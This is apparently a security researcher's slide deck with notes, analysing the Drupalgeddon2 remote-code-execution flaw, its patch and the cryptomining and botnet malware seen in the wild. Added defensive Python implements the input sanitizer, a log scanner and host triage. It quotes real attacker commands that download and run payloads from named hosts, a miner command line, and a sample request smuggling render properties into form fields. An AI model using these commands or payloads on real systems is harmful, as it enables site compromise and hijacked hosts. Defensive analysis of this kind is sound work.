1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRUPALGEDDON2 –
YET ANOTHER WEAPON
FOR THE ATTACKER
Radu - Emanuel Chișcariu, Security Research Engineer
DRUPALGEDDON2 (CVE-2018-7600)
• Remote Code Execution
• Over HTTP
• Identified by Drupal Security Team
Affected versions:
7.x up to 7.58
8.x up to 8.3.9
8.4.x up to 8.4.6
8.5.x up to 8.5.1
TLDR: all of them
FOLLOW-UP: DRUPALGEDDON3 (CVE-2018-7602)
• (Authenticated) Remote Code Execution
• Over HTTP
• Identified by Drupal Security Team
Affected versions:
7.x up to 7.59
8.x up to 8.4.8
8.5.x up to 8.5.3
ATTACK TIMELINE
DRUPAL : CORE FUNCTIONALITY
• Form API
• Renderable Arrays
  • Properties: array key, "#" prefixed
  • Form elements: no prefix on array keys
DRUPAL : CORE FUNCTIONALITY
What happens with a user request?
Client request (param/value pairs) => Form_array ($elements) => doRender() (callbacks)
● User request => create renderable arrays of components
● Callback functions invoked during rendering
Where is the vulnerability?
DRUPALGEDDON2 : VULNERABLE CODE
User request => components rendered by doRender()
Where is the entry point?
DRUPALGEDDON2 : VULNERABLE CODE
PoC is publicly available
DRUPALGEDDON2 - EXPLOIT
How did the Drupal Team patch the vulnerability?
DRUPALGEDDON2 - PATCH
A CRITICAL SECURITY update: "adding input sanitization"
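As an added example that is not code from the deck or from the Drupal project, the Python below shows the approach behind that update: "#"-prefixed keys are render-array properties reserved for code, so the sanitizer drops them from client input before the Form API sees them, and the same rule applied to constructed access-log lines gives a simple detection check. RequestSanitizer is the name of Drupal's class; the function names and sample log lines are assumptions of mine.

```python
"""Added example (not code from the deck or from Drupal): the sanitization
idea behind the Drupalgeddon2 fix, plus a defender's access-log check.
Render-array properties are '#'-prefixed array keys meant for code only, so
the fix drops any '#'-prefixed key that arrives in client input before the
Form API can see it. All sample data below is constructed."""
import re
from urllib.parse import parse_qs

PROPERTY_PREFIX = "#"

# Apache/nginx combined-log request field: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines, not the deck's honeypot data
    '203.0.113.9 - - [14/Apr/2018:10:01:02 +0000] "GET /user/register HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/Apr/2018:10:01:09 +0000] '
    '"POST /node/1?form_id=x&field%5B%23prop%5D=1 HTTP/1.1" 200 88',
    '198.51.100.4 - - [14/Apr/2018:10:02:40 +0000] '
    '"GET /user/login?destination=/node%3F%2523prop%3D1 HTTP/1.1" 302 0',
    '198.51.100.4 - - [14/Apr/2018:10:03:01 +0000] '
    '"GET /search?title=%23hashtag HTTP/1.1" 200 4096',
]


def sanitize_input(data):
    """Recursively remove every key that starts with '#' from a nested request
    array (dict). Returns (clean_copy, removed_key_paths). This mirrors the
    approach of Drupal's RequestSanitizer (query, POST and cookie input); it
    is not that class's code."""
    removed = []

    def walk(node, path):
        if not isinstance(node, dict):
            return node
        clean = {}
        for key, value in node.items():
            here = f"{path}[{key}]" if path else str(key)
            if str(key).startswith(PROPERTY_PREFIX):
                removed.append(here)  # client input must never name a property
                continue
            clean[key] = walk(value, here)
        return clean

    return walk(data, ""), removed


def parse_query(query):
    """Turn a query string into a nested dict the way PHP does, so that
    'a[b][c]=v' becomes {'a': {'b': {'c': 'v'}}} and nested '#' keys are
    visible to sanitize_input(). Percent-encoding is decoded by parse_qs."""
    result = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        parts = re.findall(r"[^\[\]]+", name)  # 'a[b][c]' -> ['a', 'b', 'c']
        if not parts:
            continue
        node = result
        for part in parts[:-1]:
            node = node.setdefault(part, {})
            if not isinstance(node, dict):  # 'a=1&a[b]=2': keep the scalar
                break
        else:
            node[parts[-1]] = values[-1]
    return result


def suspicious_keys_in_request(target):
    """Return the '#'-prefixed key paths in a request target's query string.
    The 'destination' parameter is inspected as well, because Drupal parses
    that value as a URL of its own (and the fix sanitizes it too)."""
    query = target.partition("?")[2]
    _, found = sanitize_input(parse_query(query))
    dest = parse_qs(query, keep_blank_values=True).get("destination")
    if dest:
        _, inner = sanitize_input(parse_query(dest[-1].partition("?")[2]))
        found += [f"destination:{k}" for k in inner]
    return found


def scan_access_log(lines):
    """Return (line_no, method, path, keys) for each log line whose request
    names a '#'-prefixed parameter. A '#' inside a value is not flagged."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        keys = suspicious_keys_in_request(match.group("target"))
        if keys:
            path = match.group("target").partition("?")[0]
            hits.append((line_no, match.group("method"), path, keys))
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("line %d: %s %s -> %s" % hit)
```

Access logs only show the query string, so POST bodies need the sanitizer side (or a WAF/body log) rather than this scan.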
ACTIVITY IN THE WILD
What was the malicious activity?
11 events: Saturday, April 14, 2018
637 events: Saturday, April 21, 2018
1609 events: Monday, May 7, 2018
WHAT DO THE ATTACKS LOOK LIKE?
● Sample #1: PHP Agent
# wget http://igaqd.hide-yoshi.net/mimetypes.php
SAMPLE #1 : OBFUSCATED PHP AGENT
SAMPLE #1 : PHP FILE UPLOADER
SAMPLE #2: SHELL SCRIPT
# curl -fsSL http://chrome.zer0day.ru:5050/mrx1 -o /tmp/yum.lock && sh /tmp/yum.lock
NO HONOR AMONGST THIEVES.
DEPENDENCIES
SSH BACKDOOR
START THE MINER AND PROFIT!
FURTHER INSPECTION
/tmp/migrations : /tmp/migrations -o pool.zer0day.ru:8080 -k -B
/tmp/clay: executed directly
LET’S CHECK THE MIGRATIONS FILE
Dependencies
MONERO FOR THE WIN!
FURTHER INSPECTION
We saw the /tmp/migrations file.
What about /tmp/clay?
THOSE BOTNET DIRECTIVES.
MAIN
● Anti-debugging
● Backdoor
BACKDOOR
MainBeikong()
  - /tmp/bill.lock -> /etc/init.d/
  - /tmp/gates.lod -> PID of trojan
    -> netstat, load, ps
  - /tmp/moni.lod -> /proc/cpuinfo
MainMonitor()
  - C2 communication
MainBackdoor()
  - start as daemon()
  - more resilient replication
SO ONE MORE MINER AND SLAVE FOR BOTNET!
WHAT HAVE WE LEARNED?
● Security through obscurity won’t work
● Hard release deadlines make you write bad code
● Input sanitization doesn’t ever get old
Link for the full article:
@adur_cre
Drupalgeddon2 Attack Analysis

  • 1. 1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPALGEDDON2 – YET ANOTHER WEAPON FOR THE ATTACKER Radu - Emanuel Chișcariu, Security Research Engineer
  • 2. 3© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPALGEDDON2 (CVE-2018-7600) • Remote Code Execution • Over HTTP • Identified by Drupal Security Team Affected versions: 7.x up to 7.58 8.x up to 8.3.9 8.4.x up to 8.4.6 8.5.x up to 8.5.1 TLDR: all of them
  • 3. 4© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FOLLOW-UP: DRUPALGEDDON3 (CVE-2018-7602) • (Authenticated) Remote Code Execution • Over HTTP • Identified by Drupal Security Team Affected versions: 7.x up to 7.59 8.x up to 8.4.8 8.5.x up to 8.5.3
  • 4. 5© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 5. 6© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 6. 7© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 7. 8© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 8. DRUPAL: CORE FUNCTIONALITY
    • Form API
    • Renderable arrays
    • Properties: array keys prefixed with "#"
    • Form elements: array keys with no prefix
  • 9. DRUPAL: CORE FUNCTIONALITY. What happens with a user request? Client request => param/value pairs => form array ($elements) => doRender() => callbacks
    ● A user request creates renderable arrays of components
    ● Callback functions are invoked during rendering
  • 10. DRUPALGEDDON2: VULNERABLE CODE. Where is the vulnerability? User request => components rendered by doRender()
  • 11. DRUPALGEDDON2: VULNERABLE CODE. Where is the entry point?
  • 12. DRUPALGEDDON2 - EXPLOIT. PoC is publicly available
  • 13. DRUPALGEDDON2 - PATCH. How did the Drupal team patch the vulnerability? A CRITICAL SECURITY update: "adding input sanitization"
  • 14. ACTIVITY IN THE WILD. What was the malicious activity? 11 events: Saturday, April 14, 2018; 637 events: Saturday, April 21, 2018; 1609 events: Monday, May 7, 2018
  • 15. ACTIVITY IN THE WILD (figure-only slide)
  • 16. WHAT DO THE ATTACKS LOOK LIKE? ● Sample #1: PHP agent. # wget http://igaqd.hide-yoshi.net/mimetypes.php
  • 17. SAMPLE #1: OBFUSCATED PHP AGENT
  • 18. SAMPLE #1: PHP FILE UPLOADER
  • 19. SAMPLE #2: SHELL SCRIPT. # curl -fsSL http://chrome.zer0day.ru:5050/mrx1 -o /tmp/yum.lock && sh /tmp/yum.lock
  • 20. NO HONOR AMONGST THIEVES.
  • 21. DEPENDENCIES
  • 22. SSH BACKDOOR
  • 23. START THE MINER AND PROFIT!
  • 24. FURTHER INSPECTION. /tmp/migrations: run as "/tmp/migrations -o pool.zer0day.ru:8080 -k -B" (the miner, pointed at the attacker's pool). /tmp/clay: executed directly
  • 25. LET'S CHECK THE MIGRATIONS FILE
  • 26. Dependencies
  • 27. MONERO FOR THE WIN!
  • 28. FURTHER INSPECTION. We saw the /tmp/migrations file. What about /tmp/clay?
  • 29. (figure-only slide)
  • 30. THOSE BOTNET DIRECTIVES.
  • 31. MAIN ● Anti-debugging ● Backdoor
  • 32. BACKDOOR
    MainBeikong():
    - /tmp/bill.lock -> copied into /etc/init.d/ (persistence)
    - /tmp/gates.lod -> PID of the trojan -> netstat, load, ps
    - /tmp/moni.lod -> /proc/cpuinfo
    MainMonitor(): C2 communication
    MainBackdoor(): start as daemon(); more resilient replication
  • 33. SO ONE MORE MINER AND SLAVE FOR THE BOTNET!
  • 34. WHAT HAVE WE LEARNED?
    ● Security through obscurity won't work
    ● Hard release deadlines make you write bad code
    ● Input sanitization never gets old
    Link for the full article: @adur_cre
  • 35. (figure-only slide)
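The "#"-prefixed keys from slides 8 to 13 and the sanitizer from slide 13 (and editor's note 12), as an added example in Python. This is the editor's code, not Drupal's PHP: a parser that builds the nested structure PHP gives $_GET/$_POST, a finder that lists which keys would be read as render-array properties rather than form elements, and a simplified strip_dangerous_values() in the spirit of the fix. parse_php_query, find_dangerous_keys, inspect_request, the whitelist parameter and the two sample queries are the editor's assumptions; the sample request is constructed, not a capture.

```python
"""Editor's example (not Drupal's code): how '#'-prefixed request keys reach the
render pipeline, and a sanitizer in the spirit of the fix's stripDangerousValues()."""
from urllib.parse import parse_qsl


def parse_php_query(query):
    """Build the nested structure PHP gives $_GET/$_POST for keys like
    'mail[#post_render][]' (the '#' arrives URL-encoded as %23).
    Editor's simplified parser: every container is a dict, '[]' appends."""
    result = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        if "[" in raw_key and raw_key.endswith("]"):
            head, rest = raw_key.split("[", 1)
            parts = [head] + rest[:-1].split("][")
        else:
            parts = [raw_key]
        node = result
        for i, part in enumerate(parts):
            key = len(node) if part == "" else part      # '[]' appends, as in PHP
            if i == len(parts) - 1:
                node[key] = value
            else:
                node = node.setdefault(key, {})
    return result


def find_dangerous_keys(data, path=()):
    """Paths of every key that the Form API would treat as a render-array
    *property* ('#type', '#markup', '#post_render', ...) instead of an element."""
    found = []
    if isinstance(data, dict):
        for key, value in data.items():
            here = path + (str(key),)
            if isinstance(key, str) and key.startswith("#"):
                found.append("/".join(here))
            found.extend(find_dangerous_keys(value, here))
    return found


def strip_dangerous_values(data, whitelist=(), sanitized=None):
    """Recursively drop '#'-prefixed keys unless explicitly whitelisted and record
    what was removed. Same idea as the fix, which runs over $_GET, $_POST and
    $_COOKIE early in bootstrap, before the Form API ever sees the request."""
    if sanitized is None:
        sanitized = []
    if not isinstance(data, dict):
        return data
    clean = {}
    for key, value in data.items():
        if isinstance(key, str) and key.startswith("#") and key not in whitelist:
            sanitized.append(key)
            continue
        clean[key] = strip_dangerous_values(value, whitelist, sanitized)
    return clean


# Constructed requests (editor's sample data, not captures): one smuggles render
# properties inside a form parameter, the other is an ordinary form submission.
SAMPLE_QUERY = ("form_id=user_register_form&_drupal_ajax=1"
                "&mail[%23post_render][]=exec&mail[%23type]=markup&mail[%23markup]=id")
BENIGN_QUERY = "form_id=user_register_form&mail[value]=alice%40example.org"


def inspect_request(query, whitelist=()):
    """Return (dangerous key paths, sanitized structure, list of removed keys)."""
    parsed = parse_php_query(query)
    removed = []
    clean = strip_dangerous_values(parsed, whitelist, removed)
    return find_dangerous_keys(parsed), clean, removed


if __name__ == "__main__":
    for q in (SAMPLE_QUERY, BENIGN_QUERY):
        keys, clean, removed = inspect_request(q)
        print(q, "\n  dangerous:", keys, "\n  removed:", removed, "\n  clean:", clean)
```

find_dangerous_keys() is also the check a WAF rule or request-logging hook needs. Plain web-server access logs carry only the query string, so the same keys arriving in a POST body are invisible there; the inspection has to happen at the application or reverse-proxy layer, which is why the fix sits in Drupal's bootstrap rather than in any one form handler.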

Editor's Notes

  1. My name, position. A web application vulnerability that appeared this year.
  2. RCE. A lot of articles appeared starting with 16 April. It seemed to affect all versions of Drupal.
  3. Moreover, after two weeks or so, another wave of attacks came after the patch. What happened: a user with limited permissions interacts with a confirmation form ().
  4. First patch: 21 March.
  5. Then came the security advisory (responsible disclosure).
  6. Then came the public PoC.
  7. But a different thing happened with the second wave of attacks: first came the exploit, then the patch and security advisory on the same day (full disclosure). The impact seemed to be over 1 million websites.
  8. Before going through the vulnerable code: the Form API is used for processing and presenting forms. Building blocks: renderable arrays. They map keys to HTML tags.
  9. So what happens when... The outcome of the rendering...
  10. Looking at the vulnerable code: doRender() takes care of rendering the resource requested by the client. It contains logic that renders the page with respect to the form properties within the $elements array; the form properties within the elements array affect the rendering process.
  11. The managed file element builds an AJAX response using the uploadAjaxCallback() function.
  12. Filter all items starting with a hash sign: they applied a general ... stripDangerousValues() ... hash sign. This method sanitizes input data in $_GET, $_POST and $_COOKIE during the very early stages of Drupal's bootstrap (immediately after loading the site configuration).
  13. Two days after. Cumulative. The maximum number.
  14. Our honeypots also report the source... Of course, it seems that...
  15. Terminate other mining processes if found on the machine.
  16. Install dependencies. Ensure persistence with cron jobs.
  17. Ensure attacker access by adding an authorized SSH key as a backdoor, then download some resources.
  18. Start.
  19. Looking at the strings... Also, the IPs found are reported.
  20. Collects relevant information about the system.
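Host triage for the artefacts in slides 19 to 33 and editor's notes 15 to 20 (dropped files in /tmp, init.d persistence, cron persistence, an injected SSH key, and the miner process), as an added example. This is the editor's Python, not code from the presentation or from the malware: the dropped-file paths, the download and pool hosts and the miner flags are the ones shown on the slides, while the function names, the ELF check on /etc/init.d, the ps/crontab/authorized_keys line formats and the constructed demo() snapshot are the editor's assumptions.

```python
"""Editor's example: triage a Linux host for the post-exploitation artefacts
named on the slides. Indicators are from the slides; everything else is assumed."""
import os
import re
import tempfile

# Drop locations named on the slides.
DROPPED_FILES = ["/tmp/yum.lock", "/tmp/migrations", "/tmp/clay",
                 "/tmp/bill.lock", "/tmp/gates.lod", "/tmp/moni.lod"]
# Download and mining-pool hosts named on the slides.
NETWORK_IOCS = ["igaqd.hide-yoshi.net", "chrome.zer0day.ru", "pool.zer0day.ru"]
# Miner command line seen on the slides: <binary> -o <pool>:<port> -k -B
MINER_ARGS = re.compile(r"\s-o\s+\S+:\d+(\s|.*\s)-k(\s|$)")
TMP_EXEC = re.compile(r"\s/tmp/\S+")
CRON_FETCH = re.compile(r"\b(curl|wget)\b.*https?://|/tmp/\S+")
SSH_KEY = re.compile(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+(\S+)")


def _under(root, path):
    return os.path.join(root, path.lstrip("/"))


def check_dropped_files(root="/"):
    """Indicator paths that exist on the host (root != '/' only for offline tests)."""
    return [p for p in DROPPED_FILES if os.path.exists(_under(root, p))]


def check_init_scripts(root="/"):
    """/etc/init.d entries that are ELF binaries instead of shell scripts:
    the bot copies /tmp/bill.lock there for persistence (slide 32)."""
    init_dir = _under(root, "/etc/init.d")
    hits = []
    if os.path.isdir(init_dir):
        for name in sorted(os.listdir(init_dir)):
            try:
                with open(os.path.join(init_dir, name), "rb") as fh:
                    if fh.read(4) == b"\x7fELF":
                        hits.append("/etc/init.d/" + name)
            except OSError:
                pass
    return hits


def check_processes(ps_lines):
    """ps lines running out of /tmp, talking to a host from the slides,
    or carrying the miner flags."""
    return [l for l in ps_lines
            if TMP_EXEC.search(l) or any(h in l for h in NETWORK_IOCS)
            or MINER_ARGS.search(l)]


def check_cron(crontab_lines):
    """Non-comment cron entries that fetch from the network or run out of /tmp."""
    return [l for l in crontab_lines
            if l.strip() and not l.lstrip().startswith("#") and CRON_FETCH.search(l)]


def check_authorized_keys(text, known_keys):
    """authorized_keys entries whose (type, base64 body) the administrator does not
    recognise; key options and trailing comments are ignored on purpose."""
    unknown = []
    for line in text.splitlines():
        m = SSH_KEY.search(line)
        if m and (m.group(1), m.group(2)) not in known_keys:
            unknown.append(line.strip())
    return unknown


def triage(root, ps_lines, crontab_lines, authorized_keys, known_keys):
    return {
        "dropped_files": check_dropped_files(root),
        "init_binaries": check_init_scripts(root),
        "processes": check_processes(ps_lines),
        "cron": check_cron(crontab_lines),
        "unknown_ssh_keys": check_authorized_keys(authorized_keys, known_keys),
    }


def demo():
    """Constructed snapshot of an infected host in a temp dir (sample data, not a capture)."""
    root = tempfile.mkdtemp()
    os.makedirs(_under(root, "/tmp"))
    os.makedirs(_under(root, "/etc/init.d"))
    for p in ("/tmp/migrations", "/tmp/gates.lod"):
        with open(_under(root, p), "wb") as fh:
            fh.write(b"\x7fELF\x02\x01\x01")
    with open(_under(root, "/etc/init.d/bill.lock"), "wb") as fh:   # copied ELF, not a script
        fh.write(b"\x7fELF\x02\x01\x01")
    with open(_under(root, "/etc/init.d/ssh"), "w") as fh:          # an ordinary init script
        fh.write("#!/bin/sh\n# ordinary init script\n")
    ps = ["root 4211 0.0 /usr/sbin/sshd -D",
          "www-data 5120 98.7 /tmp/migrations -o pool.zer0day.ru:8080 -k -B",
          "www-data 5133 0.1 /tmp/clay"]
    cron = ["# m h dom mon dow command",
            "0 3 * * * /usr/bin/certbot renew",
            "*/10 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 -o /tmp/yum.lock && sh /tmp/yum.lock"]
    keys = ("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdminKeyExample admin@corp\n"
            "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7NotOurKeyExample root@attacker\n")
    known = {("ssh-ed25519", "AAAAC3NzaC1lZDI1NTE5AAAAIAdminKeyExample")}
    return triage(root, ps, cron, keys, known)


if __name__ == "__main__":
    for category, findings in demo().items():
        print(category, findings)
```

On a real host the inputs are `ps axo user,pid,pcpu,args`, the root and per-user crontabs (plus /etc/cron.d), every user's ~/.ssh/authorized_keys, and root="/". The ELF check on /etc/init.d is deliberately independent of file names, since only the drop name on this particular sample is known; the indicator list catches the slides' sample but not a re-hosted one, so treat a miss as "not this sample" rather than "clean".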